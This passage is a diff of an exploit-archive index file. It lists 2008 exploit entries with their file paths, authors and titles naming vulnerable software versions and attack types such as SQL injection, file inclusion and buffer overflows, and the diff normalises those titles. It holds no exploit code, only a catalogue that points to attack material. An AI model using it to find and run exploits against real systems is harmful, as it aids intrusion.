Manzano",linux,local,0 -6033,platforms/php/webapps/6033.pl,"AuraCMS <= 2.2.2 - (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 -6034,platforms/php/webapps/6034.txt,"Dreampics Builder (page) Remote SQL Injection",2008-07-09,"Hussin X",php,webapps,0 -6035,platforms/php/webapps/6035.txt,"DreamNews Manager (id) Remote SQL Injection",2008-07-10,"Hussin X",php,webapps,0 +6032,platforms/linux/local/6032.py,"Poppler 0.8.4 libpoppler uninitialized pointer Code Execution PoC",2008-07-08,"Felipe Andres Manzano",linux,local,0 +6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 +6034,platforms/php/webapps/6034.txt,"Dreampics Builder (page) SQL Injection",2008-07-09,"Hussin X",php,webapps,0 +6035,platforms/php/webapps/6035.txt,"DreamNews Manager (id) SQL Injection",2008-07-10,"Hussin X",php,webapps,0 6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 6037,platforms/php/webapps/6037.txt,"phpDatingClub (website.php page) Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 6039,platforms/windows/local/6039.c,"Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit",2008-07-11,Shinnok,windows,local,0 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection Vulnerabilities",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - (LFI/XSS/PHPInfo) Remote Vulnerabilities",2008-10-20,StAkeR,php,webapps,0 -6043,platforms/osx/dos/6043.rb,"Core Image Fun House <= 2.0 - Arbitrary Code Execution PoC (OSX)",2008-07-11,"Adriel T. Desautels",osx,dos,0 -6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) Remote SQL Injection",2008-07-11,"Hussin X",php,webapps,0 +6043,platforms/osx/dos/6043.rb,"Core Image Fun House 2.0 - Arbitrary Code Execution PoC (OSX)",2008-07-11,"Adriel T. Desautels",osx,dos,0 +6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - (id_cat) SQL Injection",2008-07-11,"Hussin X",php,webapps,0 6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80 6046,platforms/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service PoC",2008-07-12,"Mu Security",multiple,dos,0 6047,platforms/php/webapps/6047.txt,"Maian Cart 1.1 Insecure Cookie Handling",2008-07-12,Saime,php,webapps,0 @@ -5670,18 +5670,18 @@ id,file,description,date,author,platform,type,port 6053,platforms/php/webapps/6053.php,"fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (PHP)",2008-07-12,"Inphex and real",php,webapps,0 6054,platforms/php/webapps/6054.pl,"fuzzylime CMS 3.01 - (polladd.php poll) Remote Code Execution Exploit (Perl)",2008-07-12,"Inphex and real",php,webapps,0 6055,platforms/php/webapps/6055.pl,"Joomla Component n-forms 1.01 - Blind SQL Injection Exploit",2008-07-12,"The Moorish",php,webapps,0 -6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition (id) Remote SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 +6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition (id) SQL Injection",2008-07-12,Mr.SQL,php,webapps,0 6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe - (SQL/LFI) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0 -6058,platforms/php/webapps/6058.txt,"Avlc Forum (vlc_forum.php id) - Remote SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 -6059,platforms/windows/dos/6059.pl,"Simple DNS Plus <= 5.0/4.1 - Remote Denial of Service Exploit",2008-07-13,Exodus,windows,dos,0 +6058,platforms/php/webapps/6058.txt,"Avlc Forum (vlc_forum.php id) - SQL Injection",2008-07-12,"CWH Underground",php,webapps,0 +6059,platforms/windows/dos/6059.pl,"Simple DNS Plus 5.0/4.1 - Remote Denial of Service Exploit",2008-07-13,Exodus,windows,dos,0 6060,platforms/php/webapps/6060.php,"fuzzylime CMS 3.01 - (commrss.php) Remote Code Execution Exploit",2008-07-13,"Charles Fol",php,webapps,0 -6061,platforms/php/webapps/6061.txt,"Maian Guestbook <= 3.2 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6062,platforms/php/webapps/6062.txt,"Maian Links <= 3.1 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6063,platforms/php/webapps/6063.txt,"Maian Recipe <= 1.2 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6064,platforms/php/webapps/6064.txt,"Maian Weblog <= 4.0 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6065,platforms/php/webapps/6065.txt,"Maian Uploader <= 4.0 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6066,platforms/php/webapps/6066.txt,"Maian Search <= 1.1 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 -6067,platforms/php/webapps/6067.pl,"Ultrastats <= 0.2.142 - (players-detail.php) Blind SQL Injection Exploit",2008-07-13,DNX,php,webapps,0 +6061,platforms/php/webapps/6061.txt,"Maian Guestbook 3.2 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6062,platforms/php/webapps/6062.txt,"Maian Links 3.1 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6063,platforms/php/webapps/6063.txt,"Maian Recipe 1.2 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6064,platforms/php/webapps/6064.txt,"Maian Weblog 4.0 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6065,platforms/php/webapps/6065.txt,"Maian Uploader 4.0 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6066,platforms/php/webapps/6066.txt,"Maian Search 1.1 Insecure Cookie Handling",2008-07-13,S.W.A.T.,php,webapps,0 +6067,platforms/php/webapps/6067.pl,"Ultrastats 0.2.142 - (players-detail.php) Blind SQL Injection Exploit",2008-07-13,DNX,php,webapps,0 6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a Arbitrary Add-Admin",2008-07-13,"CWH Underground",php,webapps,0 6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold - (XSS/SQL) Multiple Vulnerabilities",2008-07-13,"Encrypt3d.M!nd ",php,webapps,0 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 - (cookie) Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 @@ -5689,33 +5689,33 @@ id,file,description,date,author,platform,type,port 6072,platforms/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service Exploit",2008-07-14,"Jeremy Brown",windows,dos,0 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 - (blogpost) Local File Inclusion (win only)",2008-07-14,BugReport.IR,php,webapps,0 -6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection",2008-07-15,StAkeR,php,webapps,0 +6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a XSS / SQL Injection",2008-07-15,StAkeR,php,webapps,0 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 6077,platforms/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server Denial of Service Exploit",2008-07-15,Shinnok,windows,dos,0 6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 -6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger <= 4.1.3 - (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0 -6080,platforms/php/webapps/6080.txt,"php Help Agent <= 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 +6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0 +6080,platforms/php/webapps/6080.txt,"php Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0 6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow PoC",2008-07-15,r0ut3r,windows,dos,0 -6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-07-15,Mr.SQL,php,webapps,0 +6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injection Vulnerabilities",2008-07-15,Mr.SQL,php,webapps,0 6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution Exploit",2008-07-16,Inphex,php,webapps,0 -6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register Remote SQL Injection",2008-07-16,His0k4,php,webapps,0 -6087,platforms/php/webapps/6087.txt,"AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection",2008-07-16,"Hussin X",php,webapps,0 -6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-07-16,Mr.SQL,php,webapps,0 +6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register SQL Injection",2008-07-16,His0k4,php,webapps,0 +6087,platforms/php/webapps/6087.txt,"AlstraSoft Affiliate Network Pro (pgm) SQL Injection",2008-07-16,"Hussin X",php,webapps,0 +6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injection Vulnerabilities",2008-07-16,Mr.SQL,php,webapps,0 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution and Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0 6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Remote SELinux Privilege Elevation Exploit (Auth)",2008-07-17,eliteboy,linux,remote,0 6095,platforms/php/webapps/6095.pl,"AlstraSoft Article Manager Pro 1.6 - Blind SQL Injection Exploit",2008-07-17,GoLd_M,php,webapps,0 -6096,platforms/php/webapps/6096.txt,"preCMS 1 - (index.php page) Remote SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 +6096,platforms/php/webapps/6096.txt,"preCMS 1 - (index.php page) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - (index.php page) SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 -6099,platforms/php/webapps/6099.txt,"Siteframe (folder.php id) Remote SQL Injection",2008-07-18,n0ne,php,webapps,0 +6099,platforms/php/webapps/6099.txt,"Siteframe (folder.php id) SQL Injection",2008-07-18,n0ne,php,webapps,0 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0 -6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) Remote SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 +6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6105,platforms/asp/webapps/6105.pl,"HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 @@ -5727,7 +5727,7 @@ id,file,description,date,author,platform,type,port 6111,platforms/cgi/webapps/6111.pl,"MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6112,platforms/php/webapps/6112.txt,"EZWebAlbum (dlfilename) Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0 -6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - (pid) Remote SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 +6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - (pid) SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (Perl)",2008-07-22,"Guido Landi",windows,remote,0 6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 - (RFI/SQLl/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 @@ -5738,73 +5738,73 @@ id,file,description,date,author,platform,type,port 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 -6125,platforms/php/webapps/6125.txt,"Atom PhotoBlog 1.1.5b1 - (photoId) Remote SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 -6126,platforms/php/webapps/6126.txt,"ibase <= 2.03 - (download.php) Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 +6125,platforms/php/webapps/6125.txt,"Atom PhotoBlog 1.1.5b1 - (photoId) SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 +6126,platforms/php/webapps/6126.txt,"ibase 2.03 - (download.php) Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 -6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - (id) Remote SQL Injection",2008-07-24,IRAQI,php,webapps,0 +6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - (id) SQL Injection",2008-07-24,IRAQI,php,webapps,0 6129,platforms/minix/dos/6129.txt,"minix 3.1.2a tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 - (RFI/XSS/ig) Multiple Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0 -6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - (id) Remote SQL Injection",2008-07-25,nuclear,php,webapps,0 +6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - (id) SQL Injection",2008-07-25,nuclear,php,webapps,0 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 -6134,platforms/php/webapps/6134.txt,"phpTest 0.6.3 - (picture.php image_id) Remote SQL Injection",2008-07-25,cOndemned,php,webapps,0 -6135,platforms/asp/webapps/6135.txt,"fipsCMS light <= 2.1 - (r) Remote SQL Injection",2008-07-26,U238,asp,webapps,0 +6134,platforms/php/webapps/6134.txt,"phpTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0 +6135,platforms/asp/webapps/6135.txt,"fipsCMS light 2.1 - (r) SQL Injection",2008-07-26,U238,asp,webapps,0 6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 -6137,platforms/php/webapps/6137.txt,"IceBB <= 1.0-RC9.2 - BlindSQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 -6138,platforms/php/webapps/6138.txt,"Mobius <= 1.4.4.1 - (browse.php id) Remote SQL Injection",2008-07-26,dun,php,webapps,0 -6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - (pid) Remote SQL Injection",2008-07-26,mikeX,php,webapps,0 +6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - BlindSQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 +6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 +6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - (pid) SQL Injection",2008-07-26,mikeX,php,webapps,0 6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 Insecure Cookie Handling / SQL Injection",2008-07-26,"Encrypt3d.M!nd ",php,webapps,0 -6141,platforms/php/webapps/6141.txt,"TriO <= 2.1 - (browse.php id) Remote SQL Injection",2008-07-26,dun,php,webapps,0 +6141,platforms/php/webapps/6141.txt,"TriO 2.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0 6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - (common.php bit) Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 -6143,platforms/php/webapps/6143.txt,"Getacoder clone (sb_protype) Remote SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -6144,platforms/php/webapps/6144.txt,"GC Auction Platinum (cate_id) Remote SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS (art) Remote SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 -6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - (story.php id) Remote SQL Injection",2008-07-28,"Hussin X",php,webapps,0 -6147,platforms/php/webapps/6147.txt,"Youtuber Clone (ugroups.php UID) Remote SQL Injection",2008-07-28,"Hussin X",php,webapps,0 +6143,platforms/php/webapps/6143.txt,"Getacoder clone (sb_protype) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 +6144,platforms/php/webapps/6144.txt,"GC Auction Platinum (cate_id) SQL Injection",2008-07-27,"Hussin X",php,webapps,0 +6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 +6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - (story.php id) SQL Injection",2008-07-28,"Hussin X",php,webapps,0 +6147,platforms/php/webapps/6147.txt,"Youtuber Clone (ugroups.php UID) SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - (language) Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6151,platforms/windows/remote/6151.txt,"velocity web-server 1.0 - Directory Traversal file download",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BoF Exploit",2008-07-28,Elazar,windows,remote,0 -6153,platforms/php/webapps/6153.txt,"ATutor <= 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 -6154,platforms/php/webapps/6154.txt,"ViArt Shop <= 3.5 - (category_id) Remote SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 +6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 +6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - (lang) Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 6157,platforms/windows/local/6157.pl,"CoolPlayer - m3u File Local Buffer Overflow Exploit",2008-07-29,"Guido Landi",windows,local,0 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection Exploit",2008-07-29,"Virangar Security",php,webapps,0 -6159,platforms/php/webapps/6159.txt,"Gregarius <= 0.5.4 - rsargs[] Remote SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 -6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - (admin.php rd) RFI",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 -6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - (hioxRandomAd.php hm) RFI",2008-07-30,"Ghost Hacker",php,webapps,0 +6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - rsargs[] SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 +6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 +6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6162,platforms/php/webapps/6162.txt,"hiox browser statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 -6165,platforms/php/webapps/6165.txt,"ZeeReviews (comments.php ItemID) Remote SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 +6165,platforms/php/webapps/6165.txt,"ZeeReviews (comments.php ItemID) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 -6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard (Cat) Remote SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 +6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard (Cat) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script (cid) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 -6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 - (Calendar Module) Remote SQL Injection Exploit",2008-07-30,Jack,php,webapps,0 -6172,platforms/php/webapps/6172.pl,"Pligg <= 9.9.0 - Remote Code Execution Exploit",2008-07-30,"GulfTech Security",php,webapps,0 -6173,platforms/php/webapps/6173.txt,"pligg <= 9.9.0 - (XSS/LFI/SQL) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 +6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 - (Calendar Module) SQL Injection Exploit",2008-07-30,Jack,php,webapps,0 +6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution Exploit",2008-07-30,"GulfTech Security",php,webapps,0 +6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - (XSS/LFI/SQL) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 6174,platforms/multiple/dos/6174.txt,"F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop DoS Exploit",2008-07-31,kokanin,multiple,dos,0 6175,platforms/windows/remote/6175.html,"NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit",2008-07-31,shinnai,windows,remote,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 Cookie Poisoning and Login Bypass",2008-07-31,gnix,php,webapps,0 -6177,platforms/php/webapps/6177.php,"Symphony <= 1.7.01 - (non-patched) Remote Code Execution Exploit",2008-07-31,Raz0r,php,webapps,0 -6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery <= 1.4.18 - LFI / Remote Code Execution Exploit",2008-07-31,EgiX,php,webapps,0 +6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution Exploit",2008-07-31,Raz0r,php,webapps,0 +6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - LFI / Remote Code Execution Exploit",2008-07-31,EgiX,php,webapps,0 6179,platforms/php/webapps/6179.txt,"LetterIt 2 - (language) Local File Inclusion",2008-07-31,NoGe,php,webapps,0 -6180,platforms/php/webapps/6180.txt,"phpMyRealty (location) Remote SQL Injection",2008-08-01,CraCkEr,php,webapps,0 +6180,platforms/php/webapps/6180.txt,"phpMyRealty (location) SQL Injection",2008-08-01,CraCkEr,php,webapps,0 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote DoS Crash PoC",2008-08-01,beford,windows,dos,0 6182,platforms/php/webapps/6182.txt,"PHPAuction GPL Enhanced 2.51 - (profile.php) SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a (abg_path) Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0 -6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script (mail_id) Remote SQL Injection",2008-08-01,Corwin,php,webapps,0 -6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - (id) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - (id) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - (cid) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6188,platforms/windows/local/6188.c,"IrfanView <= 3.99 - IFF File Local Stack Buffer Overflow Exploit",2008-08-01,"fl0 fl0w",windows,local,0 -6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart (id) Remote SQL Injection",2008-08-01,"Hussin X",php,webapps,0 -6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-08-01,cOndemned,php,webapps,0 -6191,platforms/php/webapps/6191.txt,"e-vision CMS <= 2.02 - (SQL/upload/ig) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 +6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script (mail_id) SQL Injection",2008-08-01,Corwin,php,webapps,0 +6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - (id) SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - (id) SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - (cid) SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6188,platforms/windows/local/6188.c,"IrfanView 3.99 - IFF File Local Stack Buffer Overflow Exploit",2008-08-01,"fl0 fl0w",windows,local,0 +6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart (id) SQL Injection",2008-08-01,"Hussin X",php,webapps,0 +6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injection Vulnerabilities",2008-08-01,cOndemned,php,webapps,0 +6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL/upload/ig) Multiple 